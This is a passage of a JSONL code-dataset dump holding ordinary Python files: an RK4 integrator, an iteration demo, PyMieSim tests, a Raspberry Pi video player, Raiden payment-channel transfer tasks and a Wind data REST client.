print(e)\n\n\nhandler_openner()\n","sub_path":"python_spider/day01/05-ip.py","file_name":"05-ip.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"148924195","text":"# encoding utf-8\nfrom utils import div_tuple, multi_tuple, add_many_tuples, add_two_tuples\nimport csv\n\n\ndef rk4(function, x0, x1, y0, n=1, varying=False, should_pop_limit=False):\n    if isinstance(y0, tuple):\n        return rk4_tuple(function, x0, x1, y0, n)\n    else:\n        return rk4_int(function, x0, x1, y0, n)\n\n\ndef rk4_tuple(function, x0, x1, y0, n):\n    csv_file_prey = open('results_prey.csv', 'w')\n    csv_file_predator = open('results_predator.csv', 'w')\n    prey_writer = csv.writer(csv_file_prey)\n    predator_writer = csv.writer(csv_file_predator)\n\n    # Compute the step size in X from the number of intervals\n    h = (x1 - x0) / float(n)\n\n    old_y = y0\n    old_x = x0\n    for i in range(1, n + 1):\n        k1 = multi_tuple(h, function(old_x, old_y))\n        k2 = multi_tuple(h, function(old_x + 0.5 * h,\n                                     add_two_tuples(old_y,\n                                                    multi_tuple(0.5, k1))))\n        k3 = multi_tuple(h, function(old_x + 0.5 * h,\n                                     add_two_tuples(old_y,\n                                                    multi_tuple(0.5, k2))))\n        k4 = multi_tuple(h, function(old_x + h,\n                                     add_two_tuples(old_y, k3)))\n        new_x = old_x + h\n        new_y = add_two_tuples(old_y, div_tuple(6, add_many_tuples(\n            k1 + k2 + k2 + k3 + k3 + k4)))\n\n        old_y = new_y\n        old_x = new_x\n        prey_writer.writerow([new_x, old_y[0]])\n        predator_writer.writerow([new_x, old_y[1]])\n\n    csv_file_prey.close()\n    csv_file_predator.close()\n\n    return new_y\n\n\ndef rk4_int(function, x0, x1, y0, n):\n    # Compute the step size in X from the number of intervals\n    h = (x1 - x0) / float(n)\n\n    old_y = y0\n    old_x = x0\n    for i in range(1, n + 1):\n        k1 = h * function(old_x, old_y)\n        k2 = h * function(old_x + 0.5 * h, old_y + 0.5 * k1)\n        k3 = h * function(old_x + 0.5 * h, old_y + 0.5 * k2)\n        k4 = h * function(old_x + h, old_y + k3)\n        new_x = old_x + h\n        new_y = old_y + (k1 + k2 + k2 + k3 + k3 + k4) / 6\n        old_y = new_y\n        old_x = new_x\n\n    return new_y\n","sub_path":"methods/rk4.py","file_name":"rk4.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
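A self-contained sanity check of the scalar integrator in the rk4.py record above: it re-implements the same classic fourth-order Runge-Kutta update inline (so the sketch runs without the record's utils helpers, which are not shown here) and solves dy/dx = y with y(0) = 1, whose exact value at x = 1 is e.

import math

def rk4_demo(f, x0, x1, y0, n):
    # Same update rule as rk4_int above, written 2*k2 + 2*k3 for clarity.
    h = (x1 - x0) / float(n)
    x, y = x0, y0
    for _ in range(n):
        k1 = h * f(x, y)
        k2 = h * f(x + 0.5 * h, y + 0.5 * k1)
        k3 = h * f(x + 0.5 * h, y + 0.5 * k2)
        k4 = h * f(x + h, y + k3)
        y += (k1 + 2 * k2 + 2 * k3 + k4) / 6
        x += h
    return y

y1 = rk4_demo(lambda x, y: y, 0.0, 1.0, 1.0, 100)
print(y1, abs(y1 - math.e))  # global error is O(h^4), around 1e-10 here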
+{"seq_id":"19258961","text":"# Reverse iteration\nl = [1, 2, 3, 4, 5]\n# Get a reverse iterator; under the hood this calls the __reversed__ method\nprint(reversed(l))\nfor x in reversed(l):\n    print(x)\n\n# Get a forward iterator; under the hood this calls the __iter__ method\nprint(iter(l))\nfor x in iter(l):\n    print(x)\n\n\nclass FloatRange(object):\n    def __init__(self, start, end, step = 0.1):\n        self.start = start\n        self.end = end\n        self.step = step\n\n    def __iter__(self):\n        t = self.start\n        while t <= self.end:\n            yield t\n            t += self.step\n\n    def __reversed__(self):\n        t = self.end\n        while t >= self.start:\n            yield t\n            t -= self.step\n\nfor x in reversed(FloatRange(1, 5, 0.5)):\n    print(x)\n","sub_path":"第二章/3rd.py","file_name":"3rd.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
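The FloatRange class in the record above works because reversed() falls back to an object's __reversed__ hook when the argument is not a plain sequence; a minimal illustration of the same protocol:

class Countdown(object):
    # Forward iteration yields 1..n; reversed() yields n..1 via __reversed__.
    def __init__(self, n):
        self.n = n

    def __iter__(self):
        return iter(range(1, self.n + 1))

    def __reversed__(self):
        return iter(range(self.n, 0, -1))

print(list(Countdown(3)))            # [1, 2, 3]
print(list(reversed(Countdown(3))))  # [3, 2, 1]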
+{"seq_id":"231869152","text":"from unittest.mock import patch\nfrom PyMieSim.Scatterer import Sphere\nfrom PyMieSim.Source import PlaneWave\nfrom PyMieSim.Detector import Photodiode, IntegratingSphere\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_sampling_100(patch):\n    detector = Photodiode(NA=0.2, sampling=100, gamma_offset=0, phi_offset=0)\n\n    figure = detector.plot().show()\n\n    figure.close()\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_sampling_300(patch):\n    detector = Photodiode(NA=0.7, sampling=300, gamma_offset=30, phi_offset=0)\n\n    figure = detector.plot().show()\n\n    figure.close()\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_integrating_sphere(patch):\n    detector = IntegratingSphere(sampling=300)\n\n    figure = detector.plot().show()\n\n    figure.close()\n\n\n@patch(\"pyvista.Plotter.show\")\ndef test_coupling(patch):\n    source = PlaneWave(wavelength=1e-6, polarization=0, amplitude=1)\n\n    scatterer = Sphere(diameter=100e-9, source=source, index=1.4, n_medium=1.0)\n\n    detector = IntegratingSphere(sampling=300)\n\n    detector.Coupling(scatterer=scatterer)\n\n\n@patch(\"matplotlib.pyplot.show\")\ndef test_footprint(patch):\n    source = PlaneWave(wavelength=1e-6, polarization=0, amplitude=1)\n\n    scatterer = Sphere(diameter=100e-9, source=source, index=1.4, n_medium=1.0)\n\n    detector = Photodiode(NA=0.7, sampling=30, gamma_offset=30, phi_offset=0)\n\n    data = detector.get_footprint(scatterer=scatterer)\n\n    figure = data.plot().show()\n\n    figure.close()\n","sub_path":"tests/detectors/test_photodiode.py","file_name":"test_photodiode.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"197363609","text":"## Nana tv v 2.0\n#\n# Button config (matches the playtype mapping in the main loop below)\n# 1 random\n# 2 Andre Rieu\n# 3 Pride and Prejudice\n# 4 Bride and Prejudice\n\nimport os\nimport random\nimport subprocess\nimport time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(4,GPIO.IN)\nGPIO.setup(17,GPIO.IN)\nGPIO.setup(27,GPIO.IN)\nGPIO.setup(22,GPIO.IN)\n\n# 10 second window to quit before nanaTV starts\nprint(\"starting nanaTV in 10 seconds\")\ntime.sleep(10)\nprint(\"starting nanaTV\")\n\n# Generate file list\nextensionList = [\".avi\"] # list of allowed media file extensions.\nmediaDir = '/home/pi/media/'\nfileList = []\nfor root, dirnames, filenames in os.walk(mediaDir):\n    for filename in filenames:\n        if any([filename.endswith(ext) for ext in extensionList]):\n            fileList.append(os.path.join(root, filename))\n\nandreDir = '/home/pi/media/andre/'\nandreList = []\nfor root, dirnames, filenames in os.walk(andreDir):\n    for filename in filenames:\n        if any([filename.endswith(ext) for ext in extensionList]):\n            andreList.append(os.path.join(root, filename))\n\nPrideFilm = '/home/pi/media/Pride_and_Prejudice.avi'\nBrideFilm = '/home/pi/media/Bride_and_Prejudice.avi'\n\ndef getpin():\n    # get gpio pin and return\n    if (GPIO.input(4)):\n        pinno = 1\n    elif (GPIO.input(17)):\n        pinno = 2\n    elif (GPIO.input(27)):\n        pinno = 3\n    elif (GPIO.input(22)):\n        pinno = 4\n    else:\n        pinno = 0\n    return pinno\n    \ndef playdata(fileList,playtype):\n    # Play one randomly chosen file; a button press stops playback\n    # and returns the new playtype, otherwise playtype is unchanged.\n    selectedFile = random.choice(fileList)\n    p = subprocess.Popen([\"omxplayer\",\"-b\",\"-o\",\"hdmi\",selectedFile])\n    while p.poll() is None:\n        pinno = getpin()\n        if pinno != 0: \n            p.terminate()\n            playtype = pinno\n            break\n        time.sleep(0.5)\n    return playtype\n    \n\nplaytype = 1\nwhile True:\n    if playtype == 1:\n        playtype = playdata(fileList,1)\n    elif playtype == 2: \n        playtype = playdata(andreList,2)\n    elif playtype == 3: \n        playtype = playdata([PrideFilm],1)\n    elif playtype == 4: \n        playtype = playdata([BrideFilm],1) \n    else:\n        break\n    ","sub_path":"nana_tv.py","file_name":"nana_tv.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"331958094","text":"# -*- coding: utf8 -*-\nimport logging\nimport random\nimport time\n\nimport gevent\nfrom gevent.event import AsyncResult\nfrom gevent.timeout import Timeout\n\nfrom ethereum import slogging\nfrom ethereum.utils import sha3\n\nfrom raiden.messages import (\n    RefundTransfer,\n    Secret,\n    SecretRequest,\n    TransferTimeout,\n)\nfrom raiden.utils import lpex, pex\n\n__all__ = (\n    'LogListenerTask',\n    'StartMediatedTransferTask',\n    'MediateTransferTask',\n    'EndMediatedTransferTask',\n)\n\nlog = slogging.get_logger(__name__)  # pylint: disable=invalid-name\nREMOVE_CALLBACK = object()\nDEFAULT_EVENTS_POLL_TIMEOUT = 0.5\n\n\nclass Task(gevent.Greenlet):\n    \"\"\" Base class used to create tasks.\n\n    Note:\n        Always call super().__init__().\n    \"\"\"\n\n    def __init__(self):\n        super(Task, self).__init__()\n        self.response_message = None\n\n    def on_completion(self, success):\n        self.transfermanager.on_task_completed(self, success)\n        return success\n\n    def on_response(self, msg):\n        # we might have timed out before\n        if self.response_message.ready():\n            if log.isEnabledFor(logging.DEBUG):\n                log.debug(\n                    'ALREADY HAD EVENT %s %s now %s',\n                    self,\n                    self.response_message.get(),\n                    msg,\n                )\n        else:\n            if log.isEnabledFor(logging.DEBUG):\n                log.debug(\n                    'RESPONSE MESSAGE RECEIVED %s %s %s',\n                    repr(self),\n                    id(self.response_message),\n                    msg,\n                )\n\n            self.response_message.set(msg)\n\n\nclass LogListenerTask(Task):\n    \"\"\" Task for polling for filter changes. 
\"\"\"\n\n def __init__(self, listener_name, filter_, callback, contract_translator,\n events_poll_timeout=DEFAULT_EVENTS_POLL_TIMEOUT):\n \"\"\"\n Args:\n listener_name (str): A name to distinguish listener tasks.\n filter_ (raiden.network.rpc.client.Filter): A proxy for calling the\n blockchain's filter api.\n callback (function): A function to be called once an event happens.\n contract_translator (ethereum.abi.ContractTranslator): A contract\n translator to decode the event data.\n events_poll_timeout (float): How long the tasks should sleep before\n polling again.\n \"\"\"\n super(LogListenerTask, self).__init__()\n\n self.listener_name = listener_name\n self.filter_ = filter_\n self.callback = callback\n self.contract_translator = contract_translator\n\n self.stop_event = AsyncResult()\n self.sleep_time = events_poll_timeout\n\n # exposes the AsyncResult timer, this allows us to raise the timeout\n # inside this Task to force an update:\n #\n # task.kill(task.timeout)\n #\n self.timeout = None\n\n def __repr__(self):\n return ''.format(self.listener_name)\n\n def _run(self): # pylint: disable=method-hidden\n stop = None\n\n while stop is None:\n filter_changes = self.filter_.changes()\n\n for log_event in filter_changes:\n log.debug('New Events', task=self.listener_name)\n\n event = self.contract_translator.decode_event(\n log_event['topics'],\n log_event['data'],\n )\n\n if event is not None:\n originating_contract = log_event['address']\n\n try:\n self.callback(originating_contract, event)\n except:\n log.exception('unexpected exception on log listener')\n\n self.timeout = Timeout(self.sleep_time) # wait() will call cancel()\n stop = self.stop_event.wait(self.timeout)\n\n def stop(self):\n self.stop_event.set(True)\n\n\nclass AlarmTask(Task):\n \"\"\" Task to notify when a block is mined. 
\"\"\"\n\n def __init__(self, chain):\n super(AlarmTask, self).__init__()\n\n self.callbacks = list()\n self.stop_event = AsyncResult()\n self.wait_time = 0.5\n self.chain = chain\n self.last_block_number = self.chain.block_number()\n\n def register_callback(self, callback):\n \"\"\" Register a new callback.\n\n Note:\n This callback will be executed in the AlarmTask context and for\n this reason it should not block, otherwise we can miss block\n changes.\n \"\"\"\n if not callable(callback):\n raise ValueError('callback is not a callable')\n\n self.callbacks.append(callback)\n\n def _run(self): # pylint: disable=method-hidden\n stop = None\n result = None\n last_loop = time.time()\n log.debug('starting block number', block_number=self.last_block_number)\n\n while stop is None:\n current_block = self.chain.block_number()\n\n if current_block > self.last_block_number + 1:\n difference = current_block - self.last_block_number - 1\n log.error(\n 'alarm missed %s blocks',\n difference,\n )\n\n if current_block != self.last_block_number:\n self.last_block_number = current_block\n log.debug('new block', number=current_block, timestamp=last_loop)\n\n remove = list()\n for callback in self.callbacks:\n try:\n result = callback(current_block)\n except:\n log.exception('unexpected exception on alarm')\n else:\n if result is REMOVE_CALLBACK:\n remove.append(callback)\n\n for callback in remove:\n self.callbacks.remove(callback)\n\n # we want this task to iterate in the tick of `wait_time`, so take\n # into account how long we spent executing one tick.\n work_time = time.time() - last_loop\n if work_time > self.wait_time:\n log.warning(\n 'alarm loop is taking longer than the wait time',\n work_time=work_time,\n wait_time=self.wait_time,\n )\n sleep_time = 0.001\n else:\n sleep_time = self.wait_time - work_time\n\n stop = self.stop_event.wait(sleep_time)\n last_loop = time.time()\n\n def stop(self):\n self.stop_event.set(True)\n\n\nclass StartMediatedTransferTask(Task):\n def __init__(self, transfermanager, amount, target, done_result):\n super(StartMediatedTransferTask, self).__init__()\n self.amount = amount\n self.address = transfermanager.assetmanager.raiden.address\n self.target = target\n self.transfermanager = transfermanager\n self.done_result = done_result\n\n def __repr__(self):\n return '<{} {}>'.format(\n self.__class__.__name__,\n pex(self.address),\n )\n\n def _run(self): # pylint: disable=method-hidden,too-many-locals\n amount = self.amount\n target = self.target\n raiden = self.transfermanager.assetmanager.raiden\n\n fee = 0\n # there are no guarantees that the next_hop will follow the same route\n routes = self.transfermanager.assetmanager.get_best_routes(\n amount,\n target,\n lock_timeout=None,\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'START MEDIATED TRANSFER initiator:%s target:%s',\n pex(self.address),\n pex(self.target),\n )\n\n for path, forward_channel in routes:\n # try a new secret\n secret = sha3(hex(random.getrandbits(256)))\n hashlock = sha3(secret)\n\n next_hop = path[1]\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'START MEDIATED TRANSFER NEW PATH path:%s hashlock:%s',\n lpex(path),\n pex(hashlock),\n )\n\n self.transfermanager.register_task_for_hashlock(self, hashlock)\n\n lock_expiration = (\n raiden.chain.block_number() +\n forward_channel.settle_timeout -\n raiden.config['reveal_timeout']\n )\n\n mediated_transfer = forward_channel.create_mediatedtransfer(\n raiden.address,\n target,\n fee,\n amount,\n lock_expiration,\n hashlock,\n )\n 
raiden.sign(mediated_transfer)\n forward_channel.register_transfer(mediated_transfer)\n\n response = self.send_and_wait_valid(raiden, path, mediated_transfer)\n\n # `next_hop` timedout\n if response is None:\n self.transfermanager.on_hashlock_result(hashlock, False)\n\n # someone down the line timedout / couldn't proceed\n elif isinstance(response, (RefundTransfer, TransferTimeout)):\n self.transfermanager.on_hashlock_result(hashlock, False)\n\n # `target` received the MediatedTransfer\n elif response.sender == target and isinstance(response, SecretRequest):\n secret_message = Secret(secret)\n raiden.sign(secret_message)\n raiden.send_async(target, secret_message)\n\n # register the secret now and just incur with the additional\n # overhead of retrying until the `next_hop` receives the secret\n # forward_channel.register_secret(secret)\n\n # wait until `next_hop` received the secret to syncronize our\n # state (otherwise we can send a new transfer with an invalid\n # locksroot while the secret is in transit that will incur into\n # additional retry/timeout latency)\n next_hop = path[1]\n while True:\n response = self.response_message.wait()\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n if isinstance(response, Secret) and response.sender == next_hop:\n # critical read/write section\n # The channel and it's queue must be locked, a transfer\n # must not be created while we update the balance_proof.\n forward_channel.claim_lock(secret)\n raiden.send_async(next_hop, secret_message)\n # /critical write section\n\n self.transfermanager.on_hashlock_result(hashlock, True)\n self.done_result.set(True)\n\n return\n\n log.error(\n 'Invalid message ignoring. %s',\n repr(response),\n )\n else:\n log.error(\n 'Unexpected response %s',\n repr(response),\n )\n self.transfermanager.on_hashlock_result(hashlock, False)\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'START MEDIATED TRANSFER FAILED initiator:%s target:%s',\n pex(self.address),\n pex(self.target),\n )\n\n self.done_result.set(False) # all paths failed\n\n def send_and_wait_valid(self, raiden, path, mediated_transfer): # pylint: disable=no-self-use\n \"\"\" Send the `mediated_transfer` and wait for either a message from\n `target` or the `next_hop`.\n\n Validate the message received and discards the invalid ones. 
The most\n important case being next_hop sending a SecretRequest.\n \"\"\"\n message_timeout = raiden.config['msg_timeout']\n next_hop = path[1]\n target = path[-1]\n\n current_time = time.time()\n limit_time = current_time + message_timeout\n\n # this event is used by the transfermanager to notify the task that a\n # response was received\n self.response_message = AsyncResult()\n\n raiden.send_async(next_hop, mediated_transfer)\n\n while current_time <= limit_time:\n # wait for a response message (not the Ack for the transfer)\n response = self.response_message.wait(limit_time - current_time)\n\n # reset so that a value can be received either because the current\n # result was invalid or because we will wait for the next message.\n #\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n if response is None:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'MEDIATED TRANSFER TIMED OUT hashlock:%s',\n pex(mediated_transfer.lock.hashlock),\n )\n\n return None\n\n if response.sender == next_hop:\n if isinstance(response, (RefundTransfer, TransferTimeout)):\n return response\n else:\n if log.isEnabledFor(logging.INFO):\n log.info(\n 'Partner %s sent an invalid message',\n pex(next_hop),\n )\n\n return None\n\n if response.sender == target:\n if isinstance(response, SecretRequest):\n return response\n else:\n if log.isEnabledFor(logging.INFO):\n log.info(\n 'target %s sent an invalid message',\n pex(target),\n )\n\n return None\n\n current_time = time.time()\n\n if log.isEnabledFor(logging.ERROR):\n log.error(\n 'Invalid message ignoring. %s',\n repr(response),\n )\n\n return None\n\n\nclass MediateTransferTask(Task): # pylint: disable=too-many-instance-attributes\n def __init__(self, transfermanager, originating_transfer, fee):\n super(MediateTransferTask, self).__init__()\n\n self.address = transfermanager.assetmanager.raiden.address\n self.transfermanager = transfermanager\n self.fee = fee\n self.originating_transfer = originating_transfer\n\n hashlock = originating_transfer.lock.hashlock\n self.transfermanager.register_task_for_hashlock(self, hashlock)\n\n def __repr__(self):\n return '<{} {}>'.format(\n self.__class__.__name__,\n pex(self.address)\n )\n\n def _run(self): # pylint: disable=method-hidden,too-many-locals,too-many-branches,too-many-statements\n fee = self.fee\n transfer = self.originating_transfer\n\n assetmanager = self.transfermanager.assetmanager\n raiden = assetmanager.raiden\n originating_channel = assetmanager.partneraddress_channel[transfer.sender]\n\n assetmanager.register_channel_for_hashlock(\n originating_channel,\n transfer.lock.hashlock,\n )\n\n lock_expiration = transfer.lock.expiration - raiden.config['reveal_timeout']\n lock_timeout = lock_expiration - raiden.chain.block_number()\n\n # there are no guarantees that the next_hop will follow the same route\n routes = assetmanager.get_best_routes(\n transfer.lock.amount,\n transfer.target,\n lock_timeout,\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'MEDIATED TRANSFER initiator:%s node:%s target:%s',\n pex(transfer.initiator),\n pex(self.address),\n pex(transfer.target),\n )\n\n for path, forward_channel in routes:\n next_hop = path[1]\n\n mediated_transfer = forward_channel.create_mediatedtransfer(\n transfer.initiator,\n transfer.target,\n fee,\n transfer.lock.amount,\n lock_expiration,\n transfer.lock.hashlock,\n )\n raiden.sign(mediated_transfer)\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'MEDIATED TRANSFER NEW PATH path:%s 
hashlock:%s',\n lpex(path),\n pex(transfer.lock.hashlock),\n )\n\n # Using assetmanager to register the interest because it outlives\n # this task, the secret handling will happend only _once_\n assetmanager.register_channel_for_hashlock(\n forward_channel,\n transfer.lock.hashlock,\n )\n forward_channel.register_transfer(mediated_transfer)\n\n response = self.send_and_wait_valid(raiden, path, mediated_transfer)\n\n if response is None:\n timeout_message = forward_channel.create_timeouttransfer_for(transfer)\n raiden.send_async(transfer.sender, timeout_message)\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, False)\n return\n\n if isinstance(response, RefundTransfer):\n if response.lock.amount != transfer.amount:\n log.info(\n 'Partner %s sent an refund message with an invalid amount',\n pex(next_hop),\n )\n timeout_message = forward_channel.create_timeouttransfer_for(transfer)\n raiden.send_async(transfer.sender, timeout_message)\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, False)\n return\n else:\n forward_channel.register_transfer(response)\n\n elif isinstance(response, Secret):\n # update all channels and propagate the secret (this doesnt claim the lock yet)\n assetmanager.handle_secret(response.secret)\n\n # wait for the secret from `sender`\n while True:\n response = self.response_message.wait()\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n # NOTE: this relies on the fact RaindenService dispatches\n # messages based on the `hashlock` calculated from the\n # secret, so we know this `response` message secret matches\n # the secret from the `next_hop`\n if isinstance(response, Secret) and response.sender == transfer.sender:\n originating_channel.claim_lock(response.secret)\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, True)\n return\n\n # No suitable path avaiable (e.g. 
insufficient distributable, no active node)\n # Send RefundTransfer to the originating node, this has the effect of\n # backtracking in the graph search of the raiden network.\n from_address = transfer.sender\n from_channel = assetmanager.partneraddress_channel[from_address]\n\n refund_transfer = from_channel.create_refundtransfer_for(transfer)\n from_channel.register_transfer(refund_transfer)\n\n raiden.sign(refund_transfer)\n raiden.send_async(from_address, refund_transfer)\n\n log.debug(\n 'REFUND MEDIATED TRANSFER from=%s node:%s hashlock:%s',\n pex(from_address),\n pex(raiden.address),\n pex(transfer.lock.hashlock),\n )\n\n self.transfermanager.on_hashlock_result(transfer.lock.hashlock, False)\n return\n\n def send_and_wait_valid(self, raiden, path, mediated_transfer):\n message_timeout = raiden.config['msg_timeout']\n next_hop = path[1]\n\n current_time = time.time()\n limit_time = current_time + message_timeout\n\n self.response_message = AsyncResult()\n raiden.send_async(next_hop, mediated_transfer)\n\n while current_time <= limit_time:\n response = self.response_message.wait(limit_time - current_time)\n\n # critical write section\n self.response_message = AsyncResult() # reset so that a new value can be received\n # /critical write section\n\n current_time = time.time()\n\n if response is None:\n log.error(\n 'MEDIATED TRANSFER TIMED OUT node:%s timeout:%s msghash:%s hashlock:%s',\n pex(raiden.address),\n message_timeout,\n pex(mediated_transfer.hash),\n pex(mediated_transfer.lock.hashlock),\n )\n return None\n\n if isinstance(response, Secret):\n if sha3(response.secret) != mediated_transfer.lock.hashlock:\n log.error('Secret doesnt match the hashlock, ignoring.')\n continue\n\n return response\n\n if response.target != raiden.address or response.sender != next_hop:\n log.error('Invalid message supplied to the task. %s', repr(response))\n continue\n\n if isinstance(response, RefundTransfer):\n return response\n\n log.error('Partner sent an invalid message. %s', repr(response))\n\n return None\n\n\nclass EndMediatedTransferTask(Task):\n \"\"\" Task that request a secret for a registered transfer. 
\"\"\"\n\n def __init__(self, transfermanager, originating_transfer):\n super(EndMediatedTransferTask, self).__init__()\n\n self.address = transfermanager.assetmanager.raiden.address\n self.transfermanager = transfermanager\n self.originating_transfer = originating_transfer\n\n hashlock = originating_transfer.lock.hashlock\n self.transfermanager.register_task_for_hashlock(self, hashlock)\n\n def __repr__(self):\n return '<{} {}>'.format(\n self.__class__.__name__,\n pex(self.address),\n )\n\n def _run(self): # pylint: disable=method-hidden\n mediated_transfer = self.originating_transfer\n assetmanager = self.transfermanager.assetmanager\n originating_channel = assetmanager.get_channel_by_partner_address(mediated_transfer.sender)\n raiden = assetmanager.raiden\n\n log.debug(\n 'END MEDIATED TRANSFER %s -> %s msghash:%s hashlock:%s',\n pex(mediated_transfer.target),\n pex(mediated_transfer.initiator),\n pex(mediated_transfer.hash),\n pex(mediated_transfer.lock.hashlock),\n )\n\n secret_request = SecretRequest(mediated_transfer.lock.hashlock)\n raiden.sign(secret_request)\n\n response = self.send_and_wait_valid(raiden, mediated_transfer, secret_request)\n\n if response is None:\n timeout_message = originating_channel.create_timeouttransfer_for(mediated_transfer)\n raiden.send_async(mediated_transfer.sender, timeout_message)\n self.transfermanager.on_hashlock_result(mediated_transfer.lock.hashlock, False)\n return\n\n # register the secret so that a balance proof can be created but don't\n # claim until our partner has informed us that it's internal state is\n # updated\n originating_channel.register_secret(response.secret)\n\n secret_message = Secret(response.secret)\n raiden.sign(secret_message)\n raiden.send_async(mediated_transfer.sender, secret_message)\n\n # wait for the secret from `sender` to claim the lock\n while True:\n response = self.response_message.wait()\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n if isinstance(response, Secret) and response.sender == mediated_transfer.sender:\n originating_channel.claim_lock(response.secret)\n self.transfermanager.on_hashlock_result(mediated_transfer.lock.hashlock, True)\n return\n\n def send_and_wait_valid(self, raiden, mediated_transfer, secret_request):\n message_timeout = raiden.config['msg_timeout']\n\n current_time = time.time()\n limit_time = current_time + message_timeout\n\n self.response_message = AsyncResult()\n raiden.send_async(mediated_transfer.initiator, secret_request)\n\n while current_time <= limit_time:\n response = self.response_message.wait(limit_time - current_time)\n\n # critical write section\n self.response_message = AsyncResult()\n # /critical write section\n\n if response is None:\n log.error(\n 'SECRETREQUEST TIMED OUT node:%s msghash:%s hashlock:%s',\n pex(raiden.address),\n pex(secret_request.hash),\n pex(mediated_transfer.lock.hashlock),\n )\n return None\n\n if isinstance(response, Secret):\n if sha3(response.secret) != mediated_transfer.lock.hashlock:\n log.error('Secret doesnt match the hashlock, ignoring.')\n continue\n\n return response\n\n return None\n","sub_path":"raiden/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":25626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"215176814","text":"import pandas as pd\nimport requests\nimport json\nfrom datetime import datetime, date\nSTR_FORMAT_DATE = '%Y-%m-%d'\nSTR_FORMAT_DATETIME_WIND = '%Y-%m-%d %H:%M:%S' # 2017-03-06 
00:00:00.005000\nUN_AVAILABLE_DATETIME = datetime.strptime('1900-01-01', STR_FORMAT_DATE)\nUN_AVAILABLE_DATE = UN_AVAILABLE_DATETIME.date()\ndef format_datetime_to_str(dt):\n if dt is None:\n return None\n dt_type = type(dt)\n if dt_type == str:\n return dt\n elif dt_type == date:\n if dt > UN_AVAILABLE_DATE:\n return dt.strftime(STR_FORMAT_DATE)\n else:\n return None\n elif dt_type == datetime:\n if dt > UN_AVAILABLE_DATETIME:\n return dt.strftime(STR_FORMAT_DATE)\n else:\n return None\n else:\n return dt\nclass APIError(Exception):\n def __init__(self, status):\n self.status = status\n def __str__(self):\n return \"APIError:status={}\".format(self.status)\nclass WindRest:\n def __init__(self, url_str):\n self.url = url_str\n self.header = {'Content-Type': 'application/json'}\n def _url(self, path: str) -> str:\n return self.url + path\n def public_post(self, path: str, req_data: str) -> list:\n # print('self._url(path):', self._url(path))\n ret_data = requests.post(self._url(path), data=req_data, headers=self.header)\n ret_dic = ret_data.json()\n if ret_data.status_code != 200:\n raise APIError('POST / {} {}'.format(ret_data.status_code, str(ret_dic)))\n else:\n return ret_data.status_code, ret_dic\n def wset(self, table_name, options):\n path = 'wset/'\n req_data_dic = {\"table_name\": table_name, \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n df = pd.DataFrame(json_dic).T\n return df\n def wss(self, codes, fields, options=\"\"):\n path = 'wss/'\n req_data_dic = {\"codes\": codes, \"fields\": fields, \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n df = pd.DataFrame(json_dic).T\n return df\n def wsd(self, codes, fields, begin_time, end_time, options=\"\"):\n path = 'wsd/'\n req_data_dic = {\"codes\": codes, \"fields\": fields,\n \"begin_time\": format_datetime_to_str(begin_time),\n \"end_time\": format_datetime_to_str(end_time),\n \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n df = pd.DataFrame(json_dic).T\n return df\n def tdaysoffset(self, offset, begin_time, options=\"\"):\n path = 'tdaysoffset/'\n req_data_dic = {\"offset\": offset,\n \"begin_time\": format_datetime_to_str(begin_time),\n \"options\": options}\n req_data = json.dumps(req_data_dic)\n _, json_dic = self.public_post(path, req_data)\n date_str = json_dic['Date']\n return date_str\nif __name__ == \"__main__\":\n url_str = \"http://10.0.5.110:5000/wind/\"\n # url_str = \"http://10.0.3.66:5000/wind/\"\n rest = WindRest(url_str)\n # data_df = rest.wset(table_name=\"sectorconstituent\", options=\"date=2017-03-21;sectorid=1000023121000000\")\n data_df = rest.wss(codes=\"QHZG160525.OF\", fields=\"fund_setupdate,fund_maturitydate,fund_mgrcomp,fund_existingyear,fund_ptmyear,fund_type,fund_fundmanager\")\n # data_df = rest.wsd(\"600123.SH\", \"close,pct_chg\", \"2017-01-04\", \"2017-02-28\", \"PriceAdj=F\")\n print(data_df)\n # date_str = rest.tdaysoffset(1, '2017-3-31')\n # print(date_str)","sub_path":"Stage/fh_tools/windy_utils_rest.py","file_name":"windy_utils_rest.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"287696546","text":"import logging\nfrom pyogame.tools import Resources\nfrom pyogame.fleet import Fleet\nfrom pyogame.constructions import Constructions\nfrom pyogame.tools.common import coords_to_key\nfrom pyogame.abstract.planner 
